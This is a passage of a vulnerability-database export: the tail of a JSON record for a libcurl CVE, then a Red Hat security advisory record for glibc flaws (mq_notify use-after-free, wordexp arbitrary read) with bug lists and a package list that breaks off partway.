"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20266"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20673"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36222"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3620"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23840"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33929"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-0512"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33930"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23369"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3656"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3733"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36385"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36385"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3656"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23383"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0512"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23369"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4628"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23383"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33928"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33938"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381420"
},
{
"db": "VULMON",
"id": "CVE-2021-22946"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166319"
},
{
"db": "PACKETSTORM",
"id": "166112"
},
{
"db": "PACKETSTORM",
"id": "164220"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "164993"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-997"
},
{
"db": "NVD",
"id": "CVE-2021-22946"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-381420",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-22946",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165631",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166319",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166112",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164220",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165099",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164993",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202109-997",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-22946",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-09-29T00:00:00",
"db": "VULHUB",
"id": "VHN-381420",
"ident": null
},
{
"date": "2022-01-20T17:48:29",
"db": "PACKETSTORM",
"id": "165631",
"ident": null
},
{
"date": "2022-03-15T15:49:02",
"db": "PACKETSTORM",
"id": "166319",
"ident": null
},
{
"date": "2022-02-23T13:41:41",
"db": "PACKETSTORM",
"id": "166112",
"ident": null
},
{
"date": "2021-09-21T15:39:10",
"db": "PACKETSTORM",
"id": "164220",
"ident": null
},
{
"date": "2021-11-30T14:44:48",
"db": "PACKETSTORM",
"id": "165099",
"ident": null
},
{
"date": "2021-11-17T15:07:42",
"db": "PACKETSTORM",
"id": "164993",
"ident": null
},
{
"date": "2021-09-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-997",
"ident": null
},
{
"date": "2021-09-29T20:15:08.187000",
"db": "NVD",
"id": "CVE-2021-22946",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-01-05T00:00:00",
"db": "VULHUB",
"id": "VHN-381420",
"ident": null
},
{
"date": "2023-06-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-997",
"ident": null
},
{
"date": "2024-03-27T15:12:52.090000",
"db": "NVD",
"id": "CVE-2021-22946",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "164220"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-997"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "libcurl Security hole",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-997"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-997"
}
],
"trust": 0.6
}
}
VAR-202105-1306
Vulnerability from variot - Updated: 2026-03-09 22:22

The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact. The vulnerability stems from a use-after-free flaw in the library's mq_notify function. Bugs fixed (https://bugzilla.redhat.com/):
1944888 - CVE-2021-21409 netty: Request smuggling via content-length header 2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data 2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way 2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value
- Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64
- Description:
The glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the name service cache daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.
Security Fix(es):
- glibc: Arbitrary read in wordexp() (CVE-2021-35942)

- glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c (CVE-2021-27645)

- glibc: mq_notify does not handle separately allocated thread attributes (CVE-2021-33574)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section. Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the glibc library must be restarted, or the system rebooted. Bugs fixed (https://bugzilla.redhat.com/):
1871386 - glibc: Update syscall names for Linux 5.6, 5.7, and 5.8. 1912670 - semctl SEM_STAT_ANY fails to pass the buffer specified by the caller to the kernel 1927877 - CVE-2021-27645 glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c [rhel-8] 1930302 - glibc: provide IPPROTO_MPTCP definition 1932589 - CVE-2021-27645 glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c 1935128 - glibc: Rebuild glibc after objcopy fix for bug 1928936 [rhel-8.5.0] 1965408 - CVE-2021-33574 glibc: mq_notify does not handle separately allocated thread attributes 1977975 - CVE-2021-35942 glibc: Arbitrary read in wordexp()
- Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source: glibc-2.28-164.el8.src.rpm
aarch64: glibc-2.28-164.el8.aarch64.rpm glibc-all-langpacks-2.28-164.el8.aarch64.rpm glibc-common-2.28-164.el8.aarch64.rpm glibc-debuginfo-2.28-164.el8.aarch64.rpm glibc-devel-2.28-164.el8.aarch64.rpm glibc-headers-2.28-164.el8.aarch64.rpm glibc-langpack-aa-2.28-164.el8.aarch64.rpm glibc-langpack-af-2.28-164.el8.aarch64.rpm glibc-langpack-agr-2.28-164.el8.aarch64.rpm glibc-langpack-ak-2.28-164.el8.aarch64.rpm glibc-langpack-am-2.28-164.el8.aarch64.rpm glibc-langpack-an-2.28-164.el8.aarch64.rpm glibc-langpack-anp-2.28-164.el8.aarch64.rpm glibc-langpack-ar-2.28-164.el8.aarch64.rpm glibc-langpack-as-2.28-164.el8.aarch64.rpm glibc-langpack-ast-2.28-164.el8.aarch64.rpm glibc-langpack-ayc-2.28-164.el8.aarch64.rpm glibc-langpack-az-2.28-164.el8.aarch64.rpm glibc-langpack-be-2.28-164.el8.aarch64.rpm glibc-langpack-bem-2.28-164.el8.aarch64.rpm glibc-langpack-ber-2.28-164.el8.aarch64.rpm glibc-langpack-bg-2.28-164.el8.aarch64.rpm glibc-langpack-bhb-2.28-164.el8.aarch64.rpm glibc-langpack-bho-2.28-164.el8.aarch64.rpm glibc-langpack-bi-2.28-164.el8.aarch64.rpm glibc-langpack-bn-2.28-164.el8.aarch64.rpm glibc-langpack-bo-2.28-164.el8.aarch64.rpm glibc-langpack-br-2.28-164.el8.aarch64.rpm glibc-langpack-brx-2.28-164.el8.aarch64.rpm glibc-langpack-bs-2.28-164.el8.aarch64.rpm glibc-langpack-byn-2.28-164.el8.aarch64.rpm glibc-langpack-ca-2.28-164.el8.aarch64.rpm glibc-langpack-ce-2.28-164.el8.aarch64.rpm glibc-langpack-chr-2.28-164.el8.aarch64.rpm glibc-langpack-cmn-2.28-164.el8.aarch64.rpm glibc-langpack-crh-2.28-164.el8.aarch64.rpm glibc-langpack-cs-2.28-164.el8.aarch64.rpm glibc-langpack-csb-2.28-164.el8.aarch64.rpm glibc-langpack-cv-2.28-164.el8.aarch64.rpm glibc-langpack-cy-2.28-164.el8.aarch64.rpm glibc-langpack-da-2.28-164.el8.aarch64.rpm glibc-langpack-de-2.28-164.el8.aarch64.rpm glibc-langpack-doi-2.28-164.el8.aarch64.rpm glibc-langpack-dsb-2.28-164.el8.aarch64.rpm glibc-langpack-dv-2.28-164.el8.aarch64.rpm glibc-langpack-dz-2.28-164.el8.aarch64.rpm 
glibc-langpack-el-2.28-164.el8.aarch64.rpm glibc-langpack-en-2.28-164.el8.aarch64.rpm glibc-langpack-eo-2.28-164.el8.aarch64.rpm glibc-langpack-es-2.28-164.el8.aarch64.rpm glibc-langpack-et-2.28-164.el8.aarch64.rpm glibc-langpack-eu-2.28-164.el8.aarch64.rpm glibc-langpack-fa-2.28-164.el8.aarch64.rpm glibc-langpack-ff-2.28-164.el8.aarch64.rpm glibc-langpack-fi-2.28-164.el8.aarch64.rpm glibc-langpack-fil-2.28-164.el8.aarch64.rpm glibc-langpack-fo-2.28-164.el8.aarch64.rpm glibc-langpack-fr-2.28-164.el8.aarch64.rpm glibc-langpack-fur-2.28-164.el8.aarch64.rpm glibc-langpack-fy-2.28-164.el8.aarch64.rpm glibc-langpack-ga-2.28-164.el8.aarch64.rpm glibc-langpack-gd-2.28-164.el8.aarch64.rpm glibc-langpack-gez-2.28-164.el8.aarch64.rpm glibc-langpack-gl-2.28-164.el8.aarch64.rpm glibc-langpack-gu-2.28-164.el8.aarch64.rpm glibc-langpack-gv-2.28-164.el8.aarch64.rpm glibc-langpack-ha-2.28-164.el8.aarch64.rpm glibc-langpack-hak-2.28-164.el8.aarch64.rpm glibc-langpack-he-2.28-164.el8.aarch64.rpm glibc-langpack-hi-2.28-164.el8.aarch64.rpm glibc-langpack-hif-2.28-164.el8.aarch64.rpm glibc-langpack-hne-2.28-164.el8.aarch64.rpm glibc-langpack-hr-2.28-164.el8.aarch64.rpm glibc-langpack-hsb-2.28-164.el8.aarch64.rpm glibc-langpack-ht-2.28-164.el8.aarch64.rpm glibc-langpack-hu-2.28-164.el8.aarch64.rpm glibc-langpack-hy-2.28-164.el8.aarch64.rpm glibc-langpack-ia-2.28-164.el8.aarch64.rpm glibc-langpack-id-2.28-164.el8.aarch64.rpm glibc-langpack-ig-2.28-164.el8.aarch64.rpm glibc-langpack-ik-2.28-164.el8.aarch64.rpm glibc-langpack-is-2.28-164.el8.aarch64.rpm glibc-langpack-it-2.28-164.el8.aarch64.rpm glibc-langpack-iu-2.28-164.el8.aarch64.rpm glibc-langpack-ja-2.28-164.el8.aarch64.rpm glibc-langpack-ka-2.28-164.el8.aarch64.rpm glibc-langpack-kab-2.28-164.el8.aarch64.rpm glibc-langpack-kk-2.28-164.el8.aarch64.rpm glibc-langpack-kl-2.28-164.el8.aarch64.rpm glibc-langpack-km-2.28-164.el8.aarch64.rpm glibc-langpack-kn-2.28-164.el8.aarch64.rpm glibc-langpack-ko-2.28-164.el8.aarch64.rpm 
glibc-langpack-kok-2.28-164.el8.aarch64.rpm glibc-langpack-ks-2.28-164.el8.aarch64.rpm glibc-langpack-ku-2.28-164.el8.aarch64.rpm glibc-langpack-kw-2.28-164.el8.aarch64.rpm glibc-langpack-ky-2.28-164.el8.aarch64.rpm glibc-langpack-lb-2.28-164.el8.aarch64.rpm glibc-langpack-lg-2.28-164.el8.aarch64.rpm glibc-langpack-li-2.28-164.el8.aarch64.rpm glibc-langpack-lij-2.28-164.el8.aarch64.rpm glibc-langpack-ln-2.28-164.el8.aarch64.rpm glibc-langpack-lo-2.28-164.el8.aarch64.rpm glibc-langpack-lt-2.28-164.el8.aarch64.rpm glibc-langpack-lv-2.28-164.el8.aarch64.rpm glibc-langpack-lzh-2.28-164.el8.aarch64.rpm glibc-langpack-mag-2.28-164.el8.aarch64.rpm glibc-langpack-mai-2.28-164.el8.aarch64.rpm glibc-langpack-mfe-2.28-164.el8.aarch64.rpm glibc-langpack-mg-2.28-164.el8.aarch64.rpm glibc-langpack-mhr-2.28-164.el8.aarch64.rpm glibc-langpack-mi-2.28-164.el8.aarch64.rpm glibc-langpack-miq-2.28-164.el8.aarch64.rpm glibc-langpack-mjw-2.28-164.el8.aarch64.rpm glibc-langpack-mk-2.28-164.el8.aarch64.rpm glibc-langpack-ml-2.28-164.el8.aarch64.rpm glibc-langpack-mn-2.28-164.el8.aarch64.rpm glibc-langpack-mni-2.28-164.el8.aarch64.rpm glibc-langpack-mr-2.28-164.el8.aarch64.rpm glibc-langpack-ms-2.28-164.el8.aarch64.rpm glibc-langpack-mt-2.28-164.el8.aarch64.rpm glibc-langpack-my-2.28-164.el8.aarch64.rpm glibc-langpack-nan-2.28-164.el8.aarch64.rpm glibc-langpack-nb-2.28-164.el8.aarch64.rpm glibc-langpack-nds-2.28-164.el8.aarch64.rpm glibc-langpack-ne-2.28-164.el8.aarch64.rpm glibc-langpack-nhn-2.28-164.el8.aarch64.rpm glibc-langpack-niu-2.28-164.el8.aarch64.rpm glibc-langpack-nl-2.28-164.el8.aarch64.rpm glibc-langpack-nn-2.28-164.el8.aarch64.rpm glibc-langpack-nr-2.28-164.el8.aarch64.rpm glibc-langpack-nso-2.28-164.el8.aarch64.rpm glibc-langpack-oc-2.28-164.el8.aarch64.rpm glibc-langpack-om-2.28-164.el8.aarch64.rpm glibc-langpack-or-2.28-164.el8.aarch64.rpm glibc-langpack-os-2.28-164.el8.aarch64.rpm glibc-langpack-pa-2.28-164.el8.aarch64.rpm glibc-langpack-pap-2.28-164.el8.aarch64.rpm 
glibc-langpack-pl-2.28-164.el8.aarch64.rpm glibc-langpack-ps-2.28-164.el8.aarch64.rpm glibc-langpack-pt-2.28-164.el8.aarch64.rpm glibc-langpack-quz-2.28-164.el8.aarch64.rpm glibc-langpack-raj-2.28-164.el8.aarch64.rpm glibc-langpack-ro-2.28-164.el8.aarch64.rpm glibc-langpack-ru-2.28-164.el8.aarch64.rpm glibc-langpack-rw-2.28-164.el8.aarch64.rpm glibc-langpack-sa-2.28-164.el8.aarch64.rpm glibc-langpack-sah-2.28-164.el8.aarch64.rpm glibc-langpack-sat-2.28-164.el8.aarch64.rpm glibc-langpack-sc-2.28-164.el8.aarch64.rpm glibc-langpack-sd-2.28-164.el8.aarch64.rpm glibc-langpack-se-2.28-164.el8.aarch64.rpm glibc-langpack-sgs-2.28-164.el8.aarch64.rpm glibc-langpack-shn-2.28-164.el8.aarch64.rpm glibc-langpack-shs-2.28-164.el8.aarch64.rpm glibc-langpack-si-2.28-164.el8.aarch64.rpm glibc-langpack-sid-2.28-164.el8.aarch64.rpm glibc-langpack-sk-2.28-164.el8.aarch64.rpm glibc-langpack-sl-2.28-164.el8.aarch64.rpm glibc-langpack-sm-2.28-164.el8.aarch64.rpm glibc-langpack-so-2.28-164.el8.aarch64.rpm glibc-langpack-sq-2.28-164.el8.aarch64.rpm glibc-langpack-sr-2.28-164.el8.aarch64.rpm glibc-langpack-ss-2.28-164.el8.aarch64.rpm glibc-langpack-st-2.28-164.el8.aarch64.rpm glibc-langpack-sv-2.28-164.el8.aarch64.rpm glibc-langpack-sw-2.28-164.el8.aarch64.rpm glibc-langpack-szl-2.28-164.el8.aarch64.rpm glibc-langpack-ta-2.28-164.el8.aarch64.rpm glibc-langpack-tcy-2.28-164.el8.aarch64.rpm glibc-langpack-te-2.28-164.el8.aarch64.rpm glibc-langpack-tg-2.28-164.el8.aarch64.rpm glibc-langpack-th-2.28-164.el8.aarch64.rpm glibc-langpack-the-2.28-164.el8.aarch64.rpm glibc-langpack-ti-2.28-164.el8.aarch64.rpm glibc-langpack-tig-2.28-164.el8.aarch64.rpm glibc-langpack-tk-2.28-164.el8.aarch64.rpm glibc-langpack-tl-2.28-164.el8.aarch64.rpm glibc-langpack-tn-2.28-164.el8.aarch64.rpm glibc-langpack-to-2.28-164.el8.aarch64.rpm glibc-langpack-tpi-2.28-164.el8.aarch64.rpm glibc-langpack-tr-2.28-164.el8.aarch64.rpm glibc-langpack-ts-2.28-164.el8.aarch64.rpm glibc-langpack-tt-2.28-164.el8.aarch64.rpm 
glibc-langpack-ug-2.28-164.el8.aarch64.rpm glibc-langpack-uk-2.28-164.el8.aarch64.rpm glibc-langpack-unm-2.28-164.el8.aarch64.rpm glibc-langpack-ur-2.28-164.el8.aarch64.rpm glibc-langpack-uz-2.28-164.el8.aarch64.rpm glibc-langpack-ve-2.28-164.el8.aarch64.rpm glibc-langpack-vi-2.28-164.el8.aarch64.rpm glibc-langpack-wa-2.28-164.el8.aarch64.rpm glibc-langpack-wae-2.28-164.el8.aarch64.rpm glibc-langpack-wal-2.28-164.el8.aarch64.rpm glibc-langpack-wo-2.28-164.el8.aarch64.rpm glibc-langpack-xh-2.28-164.el8.aarch64.rpm glibc-langpack-yi-2.28-164.el8.aarch64.rpm glibc-langpack-yo-2.28-164.el8.aarch64.rpm glibc-langpack-yue-2.28-164.el8.aarch64.rpm glibc-langpack-yuw-2.28-164.el8.aarch64.rpm glibc-langpack-zh-2.28-164.el8.aarch64.rpm glibc-langpack-zu-2.28-164.el8.aarch64.rpm glibc-locale-source-2.28-164.el8.aarch64.rpm glibc-minimal-langpack-2.28-164.el8.aarch64.rpm libnsl-2.28-164.el8.aarch64.rpm nscd-2.28-164.el8.aarch64.rpm nss_db-2.28-164.el8.aarch64.rpm
ppc64le: glibc-2.28-164.el8.ppc64le.rpm glibc-all-langpacks-2.28-164.el8.ppc64le.rpm glibc-common-2.28-164.el8.ppc64le.rpm glibc-debuginfo-2.28-164.el8.ppc64le.rpm glibc-debuginfo-common-2.28-164.el8.ppc64le.rpm glibc-devel-2.28-164.el8.ppc64le.rpm glibc-headers-2.28-164.el8.ppc64le.rpm glibc-langpack-aa-2.28-164.el8.ppc64le.rpm glibc-langpack-af-2.28-164.el8.ppc64le.rpm glibc-langpack-agr-2.28-164.el8.ppc64le.rpm glibc-langpack-ak-2.28-164.el8.ppc64le.rpm glibc-langpack-am-2.28-164.el8.ppc64le.rpm glibc-langpack-an-2.28-164.el8.ppc64le.rpm glibc-langpack-anp-2.28-164.el8.ppc64le.rpm glibc-langpack-ar-2.28-164.el8.ppc64le.rpm glibc-langpack-as-2.28-164.el8.ppc64le.rpm glibc-langpack-ast-2.28-164.el8.ppc64le.rpm glibc-langpack-ayc-2.28-164.el8.ppc64le.rpm glibc-langpack-az-2.28-164.el8.ppc64le.rpm glibc-langpack-be-2.28-164.el8.ppc64le.rpm glibc-langpack-bem-2.28-164.el8.ppc64le.rpm glibc-langpack-ber-2.28-164.el8.ppc64le.rpm glibc-langpack-bg-2.28-164.el8.ppc64le.rpm glibc-langpack-bhb-2.28-164.el8.ppc64le.rpm glibc-langpack-bho-2.28-164.el8.ppc64le.rpm glibc-langpack-bi-2.28-164.el8.ppc64le.rpm glibc-langpack-bn-2.28-164.el8.ppc64le.rpm glibc-langpack-bo-2.28-164.el8.ppc64le.rpm glibc-langpack-br-2.28-164.el8.ppc64le.rpm glibc-langpack-brx-2.28-164.el8.ppc64le.rpm glibc-langpack-bs-2.28-164.el8.ppc64le.rpm glibc-langpack-byn-2.28-164.el8.ppc64le.rpm glibc-langpack-ca-2.28-164.el8.ppc64le.rpm glibc-langpack-ce-2.28-164.el8.ppc64le.rpm glibc-langpack-chr-2.28-164.el8.ppc64le.rpm glibc-langpack-cmn-2.28-164.el8.ppc64le.rpm glibc-langpack-crh-2.28-164.el8.ppc64le.rpm glibc-langpack-cs-2.28-164.el8.ppc64le.rpm glibc-langpack-csb-2.28-164.el8.ppc64le.rpm glibc-langpack-cv-2.28-164.el8.ppc64le.rpm glibc-langpack-cy-2.28-164.el8.ppc64le.rpm glibc-langpack-da-2.28-164.el8.ppc64le.rpm glibc-langpack-de-2.28-164.el8.ppc64le.rpm glibc-langpack-doi-2.28-164.el8.ppc64le.rpm glibc-langpack-dsb-2.28-164.el8.ppc64le.rpm glibc-langpack-dv-2.28-164.el8.ppc64le.rpm 
glibc-langpack-dz-2.28-164.el8.ppc64le.rpm glibc-langpack-el-2.28-164.el8.ppc64le.rpm glibc-langpack-en-2.28-164.el8.ppc64le.rpm glibc-langpack-eo-2.28-164.el8.ppc64le.rpm glibc-langpack-es-2.28-164.el8.ppc64le.rpm glibc-langpack-et-2.28-164.el8.ppc64le.rpm glibc-langpack-eu-2.28-164.el8.ppc64le.rpm glibc-langpack-fa-2.28-164.el8.ppc64le.rpm glibc-langpack-ff-2.28-164.el8.ppc64le.rpm glibc-langpack-fi-2.28-164.el8.ppc64le.rpm glibc-langpack-fil-2.28-164.el8.ppc64le.rpm glibc-langpack-fo-2.28-164.el8.ppc64le.rpm glibc-langpack-fr-2.28-164.el8.ppc64le.rpm glibc-langpack-fur-2.28-164.el8.ppc64le.rpm glibc-langpack-fy-2.28-164.el8.ppc64le.rpm glibc-langpack-ga-2.28-164.el8.ppc64le.rpm glibc-langpack-gd-2.28-164.el8.ppc64le.rpm glibc-langpack-gez-2.28-164.el8.ppc64le.rpm glibc-langpack-gl-2.28-164.el8.ppc64le.rpm glibc-langpack-gu-2.28-164.el8.ppc64le.rpm glibc-langpack-gv-2.28-164.el8.ppc64le.rpm glibc-langpack-ha-2.28-164.el8.ppc64le.rpm glibc-langpack-hak-2.28-164.el8.ppc64le.rpm glibc-langpack-he-2.28-164.el8.ppc64le.rpm glibc-langpack-hi-2.28-164.el8.ppc64le.rpm glibc-langpack-hif-2.28-164.el8.ppc64le.rpm glibc-langpack-hne-2.28-164.el8.ppc64le.rpm glibc-langpack-hr-2.28-164.el8.ppc64le.rpm glibc-langpack-hsb-2.28-164.el8.ppc64le.rpm glibc-langpack-ht-2.28-164.el8.ppc64le.rpm glibc-langpack-hu-2.28-164.el8.ppc64le.rpm glibc-langpack-hy-2.28-164.el8.ppc64le.rpm glibc-langpack-ia-2.28-164.el8.ppc64le.rpm glibc-langpack-id-2.28-164.el8.ppc64le.rpm glibc-langpack-ig-2.28-164.el8.ppc64le.rpm glibc-langpack-ik-2.28-164.el8.ppc64le.rpm glibc-langpack-is-2.28-164.el8.ppc64le.rpm glibc-langpack-it-2.28-164.el8.ppc64le.rpm glibc-langpack-iu-2.28-164.el8.ppc64le.rpm glibc-langpack-ja-2.28-164.el8.ppc64le.rpm glibc-langpack-ka-2.28-164.el8.ppc64le.rpm glibc-langpack-kab-2.28-164.el8.ppc64le.rpm glibc-langpack-kk-2.28-164.el8.ppc64le.rpm glibc-langpack-kl-2.28-164.el8.ppc64le.rpm glibc-langpack-km-2.28-164.el8.ppc64le.rpm glibc-langpack-kn-2.28-164.el8.ppc64le.rpm 
glibc-langpack-ko-2.28-164.el8.ppc64le.rpm glibc-langpack-kok-2.28-164.el8.ppc64le.rpm glibc-langpack-ks-2.28-164.el8.ppc64le.rpm glibc-langpack-ku-2.28-164.el8.ppc64le.rpm glibc-langpack-kw-2.28-164.el8.ppc64le.rpm glibc-langpack-ky-2.28-164.el8.ppc64le.rpm glibc-langpack-lb-2.28-164.el8.ppc64le.rpm glibc-langpack-lg-2.28-164.el8.ppc64le.rpm glibc-langpack-li-2.28-164.el8.ppc64le.rpm glibc-langpack-lij-2.28-164.el8.ppc64le.rpm glibc-langpack-ln-2.28-164.el8.ppc64le.rpm glibc-langpack-lo-2.28-164.el8.ppc64le.rpm glibc-langpack-lt-2.28-164.el8.ppc64le.rpm glibc-langpack-lv-2.28-164.el8.ppc64le.rpm glibc-langpack-lzh-2.28-164.el8.ppc64le.rpm glibc-langpack-mag-2.28-164.el8.ppc64le.rpm glibc-langpack-mai-2.28-164.el8.ppc64le.rpm glibc-langpack-mfe-2.28-164.el8.ppc64le.rpm glibc-langpack-mg-2.28-164.el8.ppc64le.rpm glibc-langpack-mhr-2.28-164.el8.ppc64le.rpm glibc-langpack-mi-2.28-164.el8.ppc64le.rpm glibc-langpack-miq-2.28-164.el8.ppc64le.rpm glibc-langpack-mjw-2.28-164.el8.ppc64le.rpm glibc-langpack-mk-2.28-164.el8.ppc64le.rpm glibc-langpack-ml-2.28-164.el8.ppc64le.rpm glibc-langpack-mn-2.28-164.el8.ppc64le.rpm glibc-langpack-mni-2.28-164.el8.ppc64le.rpm glibc-langpack-mr-2.28-164.el8.ppc64le.rpm glibc-langpack-ms-2.28-164.el8.ppc64le.rpm glibc-langpack-mt-2.28-164.el8.ppc64le.rpm glibc-langpack-my-2.28-164.el8.ppc64le.rpm glibc-langpack-nan-2.28-164.el8.ppc64le.rpm glibc-langpack-nb-2.28-164.el8.ppc64le.rpm glibc-langpack-nds-2.28-164.el8.ppc64le.rpm glibc-langpack-ne-2.28-164.el8.ppc64le.rpm glibc-langpack-nhn-2.28-164.el8.ppc64le.rpm glibc-langpack-niu-2.28-164.el8.ppc64le.rpm glibc-langpack-nl-2.28-164.el8.ppc64le.rpm glibc-langpack-nn-2.28-164.el8.ppc64le.rpm glibc-langpack-nr-2.28-164.el8.ppc64le.rpm glibc-langpack-nso-2.28-164.el8.ppc64le.rpm glibc-langpack-oc-2.28-164.el8.ppc64le.rpm glibc-langpack-om-2.28-164.el8.ppc64le.rpm glibc-langpack-or-2.28-164.el8.ppc64le.rpm glibc-langpack-os-2.28-164.el8.ppc64le.rpm glibc-langpack-pa-2.28-164.el8.ppc64le.rpm 
glibc-langpack-pap-2.28-164.el8.ppc64le.rpm glibc-langpack-pl-2.28-164.el8.ppc64le.rpm glibc-langpack-ps-2.28-164.el8.ppc64le.rpm glibc-langpack-pt-2.28-164.el8.ppc64le.rpm glibc-langpack-quz-2.28-164.el8.ppc64le.rpm glibc-langpack-raj-2.28-164.el8.ppc64le.rpm glibc-langpack-ro-2.28-164.el8.ppc64le.rpm glibc-langpack-ru-2.28-164.el8.ppc64le.rpm glibc-langpack-rw-2.28-164.el8.ppc64le.rpm glibc-langpack-sa-2.28-164.el8.ppc64le.rpm glibc-langpack-sah-2.28-164.el8.ppc64le.rpm glibc-langpack-sat-2.28-164.el8.ppc64le.rpm glibc-langpack-sc-2.28-164.el8.ppc64le.rpm glibc-langpack-sd-2.28-164.el8.ppc64le.rpm glibc-langpack-se-2.28-164.el8.ppc64le.rpm glibc-langpack-sgs-2.28-164.el8.ppc64le.rpm glibc-langpack-shn-2.28-164.el8.ppc64le.rpm glibc-langpack-shs-2.28-164.el8.ppc64le.rpm glibc-langpack-si-2.28-164.el8.ppc64le.rpm glibc-langpack-sid-2.28-164.el8.ppc64le.rpm glibc-langpack-sk-2.28-164.el8.ppc64le.rpm glibc-langpack-sl-2.28-164.el8.ppc64le.rpm glibc-langpack-sm-2.28-164.el8.ppc64le.rpm glibc-langpack-so-2.28-164.el8.ppc64le.rpm glibc-langpack-sq-2.28-164.el8.ppc64le.rpm glibc-langpack-sr-2.28-164.el8.ppc64le.rpm glibc-langpack-ss-2.28-164.el8.ppc64le.rpm glibc-langpack-st-2.28-164.el8.ppc64le.rpm glibc-langpack-sv-2.28-164.el8.ppc64le.rpm glibc-langpack-sw-2.28-164.el8.ppc64le.rpm glibc-langpack-szl-2.28-164.el8.ppc64le.rpm glibc-langpack-ta-2.28-164.el8.ppc64le.rpm glibc-langpack-tcy-2.28-164.el8.ppc64le.rpm glibc-langpack-te-2.28-164.el8.ppc64le.rpm glibc-langpack-tg-2.28-164.el8.ppc64le.rpm glibc-langpack-th-2.28-164.el8.ppc64le.rpm glibc-langpack-the-2.28-164.el8.ppc64le.rpm glibc-langpack-ti-2.28-164.el8.ppc64le.rpm glibc-langpack-tig-2.28-164.el8.ppc64le.rpm 